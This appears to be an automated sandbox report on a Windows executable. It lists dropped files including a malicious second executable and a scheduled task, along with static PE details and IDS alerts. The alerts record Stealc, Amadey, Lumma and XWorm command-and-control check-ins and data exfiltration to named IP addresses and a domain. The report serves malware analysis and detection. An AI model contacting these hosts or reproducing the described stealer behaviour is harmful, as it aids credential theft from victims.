SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\AAAAECGHCB.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3250176
Entropy (8bit):	6.661589759584452
Encrypted:	false
SSDEEP:	49152:fRJMruozPf7jRXiGUxje9PbY1vMz2GXGgEyXYZ:5JMruIPf7hiZxje9jYlg2lZyX
MD5:	8EFB48F6DD50828EA9F89FE49C923C17
SHA1:	BCCBB5B0C247548092BACF5F4DE0279FB704E9FF
SHA-256:	2E0A911E8313A1575777B217A5C20EF0F7C57EF234FD173421D712DB3D6F9882
SHA-512:	DDDE88F931D4B017DAA144762CC91F7E5A029897696CAD5720D2579469B6A502DD8DB531C42FD5B468A1FED5DCB5EEFD6E44D8F4F611E2DFBF739BD0322464D6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....E.2...@.................................W...k...........................`.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...uxwkwojh..........................@...xuxxpxvl......1......r1.............@....taggant.0....1.."...v1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Documents\AAAAECGHCB.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.504020621774524
Encrypted:	false
SSDEEP:	6:uwZfZqDZXUKJUEZ+lX1CGdKUe6tcVAkXIEZ8MlW8+y0lztmldt0:usfZGlvJQ1CGAFMkXd8kX+Vz0zt0
MD5:	BF7872B30F12641FEAB50D7D43BE64FF
SHA1:	EA83791B502745A63935485611AEEB4B0763D5E9
SHA-256:	B2541FEF92B033671F32D8BE280D8E49C7AB54FF54724D1488F2FF8ABFAFC6BC
SHA-512:	39B63CC54BDDC80CFC100629107B779364A418476C51ECBC307FEC53352EEC8D10BE833D8597C559194EE03130DDF01677F9135C2BB3FE48D1A5B5F8AE57CBDA
Malicious:	false
Preview:	........v.@.W.\|..k&F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134253
Entropy (8bit):	5.441825532012751
Encrypted:	false
SSDEEP:	3072:f/kX33ov7GsG688fJbk/5xns8LWjwR2i6o:fg3lr6t2/5xns8awR8o
MD5:	F25C048F731BDEC0733B3024C02DC1D3
SHA1:	4C80D6DF6583E44D8059D2AD65FECFB7CCECF607
SHA-256:	AC99DDF967308ADEB4C88122FC163E32F5EE99E59C9A37FD1FF055E2BB7D0C65
SHA-512:	D1FEA19AD6788005FDFB3B2F27D9374CBDD52C1D658B17B401424FB4F1A6DD6F478107F666918B5A981535968586BE7ACB6BDCA6872C8C43A2290634A9B74C21
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	179299
Entropy (8bit):	5.547369532089825
Encrypted:	false
SSDEEP:	3072:eEBR1XAUw+9+in7oNRFhJpGOa9VMgoeSWInJ+LBIwK555ypuq/dP/JlpNMWzeAx+:eKR1tw+9+i7GFhJcOa/MgoeSWIJ+LBI/
MD5:	E51B78D04BF7FEADF2B7281088079FD5
SHA1:	47E0DCBBC95DA92A2B5E973C33200C3DD82E18A6
SHA-256:	7E8CC44AC8BED91DC83AF132CA1F374227C3A634F9020FFC66720C74A8DBAA53
SHA-512:	5377F671601862CBB506C1B33AA5F5ACAC2C451998C8A1A8E8C6754D2D11C96484483C081FB3A0407BAF1329D70F41ADE5CAB27993B6FA631384243BFC890813
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv_QWZGpfkLjSgGX6lavnloO0T86g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (752)
Category:	downloaded
Size (bytes):	757
Entropy (8bit):	5.159206121223534
Encrypted:	false
SSDEEP:	12:uB2TlssBbfWJC7rPJWE7BHslriFTAYsSw7sZAnIIIIIII5wuCPXIwuGHHHHHHHYU:K2LfPPnBHslgT9lCuABuoB7HHHHHHHYU
MD5:	5AFB108ADDADF49BDD96DAF84705ADAB
SHA1:	9848BC8D8E8385153BB971E89B13A1D5A63C5F6C
SHA-256:	66A83CDBF1B4A9E06CDACAF37216214E0D333D36ACDCBD937691F9A524C55497
SHA-512:	D1E3FF264B1ADEBDCDC0B70B22209CD52028DD77396B9D798E54EB6DB24C5A7E35CA1CCBC95275BDC504B34236BB2BBEB2805BB6E23BC9E71118D03BF52AF511
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["ravens diontae johnson","subaru reliability","storm darragh weather warnings","marvel rivals characters roles","majin buu vs majin kuu","unemployment jobs report","apple ios 18.2","holmes ny mets"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.565955825227696
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	5'277'184 bytes
MD5:	2704b8659485a783c81f96440f2f5ca4
SHA1:	d8883d8802dd0363cc505cbae99d3c37fa83b283
SHA256:	a63c8da0504eb526d7a28d684872a1aca575819f46a0ecef131d30ac2d6da4ed
SHA512:	84bb63aeaf561b26b86475f4eedd99b368f697bc760afe9f16557a585cf4e747d6d8b68f0fd27af0883fd6d81386e5304d49bfee4d365820b6c2fce6218d3284
SSDEEP:	49152:63T9U3oVHLbwpaN4j7fMljwRMyWrMQFn:ET9goVrbv4j7EpuTAF
TLSH:	23364A927A477DCBE44AE67EB72FDD42595F83B847100CC3981874B9AEE3DC011A5E28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........PE..L...<.Jg...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x909000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x674AE73C [Sat Nov 30 10:21:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F1D94CD611Ah
pcmpgtb mm2, qword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F1D94CD8115h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x1f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x249000	62fa2de6eb331176043e905d2f543b9f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1f0	0x200	9536d2b3a2eda870e2407104c9596139	False	0.576171875	data	5.048164681214948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
amfccvoo	0x24c000	0x2bc000	0x2bbc00	16af4fee768e94f4701222b1725b58ff	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rdzlrlxp	0x508000	0x1000	0x400	7ff41cd01913ad16661637214f386e9e	False	0.8037109375	data	6.239021232924145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x509000	0x3000	0x2200	c5b85d513181f9ae60782cb627bd1bb3	False	0.06341911764705882	DOS executable (COM)	0.7149631499136473	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x24a058	0x198	ASCII text, with CRLF line terminators			0.5833333333333334

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-07T12:59:12.246711+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T12:59:12.693023+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T12:59:12.814627+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.7	49701	TCP
2024-12-07T12:59:13.143279+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T12:59:13.272980+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.7	49701	TCP
2024-12-07T12:59:14.588048+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T12:59:15.566968+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T12:59:44.193563+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:46.107197+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:47.502317+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:48.691740+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:52.256701+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:53.383845+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:59.171322+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49829	185.215.113.16	80	TCP
2024-12-07T13:00:34.763032+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.7	49904	185.215.113.43	80	TCP
2024-12-07T13:00:39.307009+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49915	31.41.244.11	80	TCP
2024-12-07T13:00:44.750548+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.7	49913	TCP
2024-12-07T13:00:46.086982+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49932	185.215.113.43	80	TCP
2024-12-07T13:00:47.587255+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49936	185.215.113.16	80	TCP
2024-12-07T13:00:53.304937+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.7	55337	1.1.1.1	53	UDP
2024-12-07T13:00:54.438192+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49953	185.215.113.43	80	TCP
2024-12-07T13:00:54.668397+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.7	49954	104.21.16.9	443	TCP
2024-12-07T13:00:54.668397+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49954	104.21.16.9	443	TCP
2024-12-07T13:00:55.894697+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49959	185.215.113.16	80	TCP
2024-12-07T13:00:56.809264+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49954	104.21.16.9	443	TCP
2024-12-07T13:00:56.809264+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49954	104.21.16.9	443	TCP
2024-12-07T13:00:57.290621+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.7	49966	104.21.16.9	443	TCP
2024-12-07T13:00:57.290621+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49966	104.21.16.9	443	TCP
2024-12-07T13:01:04.435070+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	112.213.116.149	7000	192.168.2.7	49946	TCP
2024-12-07T13:01:04.554830+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.7	49946	112.213.116.149	7000	TCP
2024-12-07T13:01:08.057178+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49987	185.215.113.43	80	TCP
2024-12-07T13:01:09.512441+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49994	185.215.113.16	80	TCP
2024-12-07T13:01:09.536496+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49991	185.215.113.206	80	TCP
2024-12-07T13:01:14.561754+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.7	50005	104.21.16.9	443	TCP
